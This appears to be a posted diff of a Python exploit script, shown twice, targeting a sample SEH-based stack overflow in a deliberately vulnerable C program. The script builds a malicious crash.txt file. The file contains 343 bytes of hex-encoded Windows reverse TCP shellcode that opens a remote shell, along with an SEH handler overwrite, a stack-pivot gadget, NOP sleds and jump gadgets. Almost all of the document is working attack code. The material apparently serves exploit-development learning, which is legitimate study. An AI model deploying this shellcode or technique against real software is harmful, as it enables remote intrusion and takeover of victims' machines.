e3prom · January 18, 2018 14:54
diff --git a/generic-stack-overflow-file-exploit.py b/generic-stack-overflow-file-exploit.py
 # generic-stack-overflow-file-exploit.py
 # Sample exploit code for the generic-stack-overflow-file.c, available at:
 # https://github.com/e3prom/shellcode/blob/master/dev/generic-stack-overflow.c
 #
 # Exploitability:
 # There is no direct RP overwrite, however we can control the SE handler pointer at offset 808.
 # The SE handler pointer points to a stack pivot.
 # This exploit is a little bit messy, I do apologize.
 import struct
 file = 'crash.txt'

 # shellcode is 343 bytes.
 # Reverse TCP shellcode (connectback), crafted with love.
 shellcode = "\x31\xc0\x64\x8b\x40\x30\x8b\x40\x0c\x8b\x70\x14\xad\x96\xad\x8b\x40\x10\x50\x97\xbe\x8e\x4e\x0e\xec\x31\xc9\x41\x60\x8b\x2c\x24\x8b\x45\x3c\x8b\x54\x05\x78\x01\xea\x8b\x4a\x18\x8b\x5a\x20\x01\xeb\xe3\x30\x49\x8b\x34\x8b\x01\xee\x31\xff\x31\xc0\xfc\xac\x84\xc0\x74\x07\xc1\xcf\x0d\x01\xc7\xeb\xf4\x3b\x7c\x24\x04\x75\xe1\x8b\x5a\x24\x01\xeb\x66\x8b\x0c\x4b\x8b\x5a\x1c\x01\xeb\x8b\x04\x8b\x01\xe8\x89\x44\x24\x1c\x61\x85\xc9\x75\x01\xc3\x50\x31\xc0\x66\xb8\x33\x32\x50\x68\x77\x73\x32\x5f\x89\xe7\x8b\x44\x24\x08\x60\xff\x54\x24\x1c\x68\xde\xad\xc0\xde\x89\x44\x24\x1c\x61\x50\x89\xc7\xbe\xef\x09\xf5\xad\x31\xc9\xe8\x7e\xff\xff\xff\x66\xb9\x21\x02\x29\xc8\x66\xb9\x90\x01\x29\xcc\x89\xe5\x54\x6a\x02\xff\xd0\x31\xc9\x66\xb9\x90\x01\x01\xcc\x58\x31\xc9\x89\xc7\xbe\xd9\x09\xf5\xad\xe8\x54\xff\xff\xff\x50\xbe\xec\xf9\xaa\x60\xe8\x49\xff\xff\xff\x50\x8b\x7c\x24\x14\xbe\x72\xfe\xb3\x16\xe8\x3a\xff\xff\xff\x50\xbe\x7e\xd8\xe2\x73\xe8\x2f\xff\xff\xff\x50\x31\xc0\x50\x50\x50\x50\x40\x50\x40\x50\xff\x54\x24\x24\x89\xc6\x68\x0a\x01\x02\xb1\xb8\x02\x01\x7a\x69\xfe\xcc\x50\x89\xe3\x31\xc0\xb0\x10\x50\x53\x56\xff\x54\x24\x1c\xb8\x31\x63\x6d\x64\xc1\xf8\x08\x50\x54\x31\xc9\xb1\x54\x29\xcc\x89\xe7\x57\x31\xc0\xf3\xaa\x5f\xc6\x07\x44\xfe\x47\x2d\x57\x89\xf0\x8d\x7f\x38\xab\xab\xab\x5f\x31\xc0\x8d\x77\x44\x56\x57\x50\x50\x50\x40\x50\x48\x50\x50\xff\x74\x24\x74\x50\xff\x56\x24"

 # SE handler pointer overwrite.
 # ADD ESP,14 # MOV EAX,1 # POP EBX # POP ESI # RETN 0x0C
 seh = struct.pack('<L', 0x4019d6)

 # Gadget #1
 # The idea here is to make the instruction we've no control of, unharmful.
 # The ADD EAX instruction will take the instructions as an simple operand.
 # NOP # NOP # ADD EAX [Unwanted instructions/operand]
 gadget = "\x90\x90\x81\xc0"

 # Gadget #2
 # After the return from SEH chain:
 # at EBX + 0x18, we've a pointer to our shellcode.
 # We can simply increase EBX 24 times, then jump using the pointer at EBX.
 # # INC EBX * 24 # JMP [EBX]
 gadget2 = "C" * 24 + '\xff\x23'

 nops = "\x90" * 100
 padding = 'A' * (800 - len(shellcode + nops))
 align = 'B' * 343

 payload = nops + shellcode + padding + gadget + seh + gadget2 + align

 f = open(file, 'w')
 f.write(payload)
 print "File", file, "has been created."
 f.close()
	# generic-stack-overflow-file-exploit.py
	# Sample exploit code for the generic-stack-overflow-file.c, available at:
	# https://github.com/e3prom/shellcode/blob/master/dev/generic-stack-overflow.c
	#
	# Exploitability:
	# There is no direct RP overwrite, however we can control the SE handler pointer at offset 808.
	# The SE handler pointer points to a stack pivot.
	# This exploit is a little bit messy, I do apologize.
	import struct
	file = 'crash.txt'

	# shellcode is 343 bytes.
	# Reverse TCP shellcode (connectback), crafted with love.
	shellcode = "\x31\xc0\x64\x8b\x40\x30\x8b\x40\x0c\x8b\x70\x14\xad\x96\xad\x8b\x40\x10\x50\x97\xbe\x8e\x4e\x0e\xec\x31\xc9\x41\x60\x8b\x2c\x24\x8b\x45\x3c\x8b\x54\x05\x78\x01\xea\x8b\x4a\x18\x8b\x5a\x20\x01\xeb\xe3\x30\x49\x8b\x34\x8b\x01\xee\x31\xff\x31\xc0\xfc\xac\x84\xc0\x74\x07\xc1\xcf\x0d\x01\xc7\xeb\xf4\x3b\x7c\x24\x04\x75\xe1\x8b\x5a\x24\x01\xeb\x66\x8b\x0c\x4b\x8b\x5a\x1c\x01\xeb\x8b\x04\x8b\x01\xe8\x89\x44\x24\x1c\x61\x85\xc9\x75\x01\xc3\x50\x31\xc0\x66\xb8\x33\x32\x50\x68\x77\x73\x32\x5f\x89\xe7\x8b\x44\x24\x08\x60\xff\x54\x24\x1c\x68\xde\xad\xc0\xde\x89\x44\x24\x1c\x61\x50\x89\xc7\xbe\xef\x09\xf5\xad\x31\xc9\xe8\x7e\xff\xff\xff\x66\xb9\x21\x02\x29\xc8\x66\xb9\x90\x01\x29\xcc\x89\xe5\x54\x6a\x02\xff\xd0\x31\xc9\x66\xb9\x90\x01\x01\xcc\x58\x31\xc9\x89\xc7\xbe\xd9\x09\xf5\xad\xe8\x54\xff\xff\xff\x50\xbe\xec\xf9\xaa\x60\xe8\x49\xff\xff\xff\x50\x8b\x7c\x24\x14\xbe\x72\xfe\xb3\x16\xe8\x3a\xff\xff\xff\x50\xbe\x7e\xd8\xe2\x73\xe8\x2f\xff\xff\xff\x50\x31\xc0\x50\x50\x50\x50\x40\x50\x40\x50\xff\x54\x24\x24\x89\xc6\x68\x0a\x01\x02\xb1\xb8\x02\x01\x7a\x69\xfe\xcc\x50\x89\xe3\x31\xc0\xb0\x10\x50\x53\x56\xff\x54\x24\x1c\xb8\x31\x63\x6d\x64\xc1\xf8\x08\x50\x54\x31\xc9\xb1\x54\x29\xcc\x89\xe7\x57\x31\xc0\xf3\xaa\x5f\xc6\x07\x44\xfe\x47\x2d\x57\x89\xf0\x8d\x7f\x38\xab\xab\xab\x5f\x31\xc0\x8d\x77\x44\x56\x57\x50\x50\x50\x40\x50\x48\x50\x50\xff\x74\x24\x74\x50\xff\x56\x24"

	# SE handler pointer overwrite.
	# ADD ESP,14 # MOV EAX,1 # POP EBX # POP ESI # RETN 0x0C
	seh = struct.pack('<L', 0x4019d6)

	# Gadget #1
	# The idea here is to make the instruction we've no control of, unharmful.
	# The ADD EAX instruction will take the instructions as an simple operand.
	# NOP # NOP # ADD EAX [Unwanted instructions/operand]
	gadget = "\x90\x90\x81\xc0"

	# Gadget #2
	# After the return from SEH chain:
	# at EBX + 0x18, we've a pointer to our shellcode.
	# We can simply increase EBX 24 times, then jump using the pointer at EBX.
	# # INC EBX * 24 # JMP [EBX]
	gadget2 = "C" * 24 + '\xff\x23'

	nops = "\x90" * 100
	padding = 'A' * (800 - len(shellcode + nops))
	align = 'B' * 343

	payload = nops + shellcode + padding + gadget + seh + gadget2 + align

	f = open(file, 'w')
	f.write(payload)
	print "File", file, "has been created."
	f.close()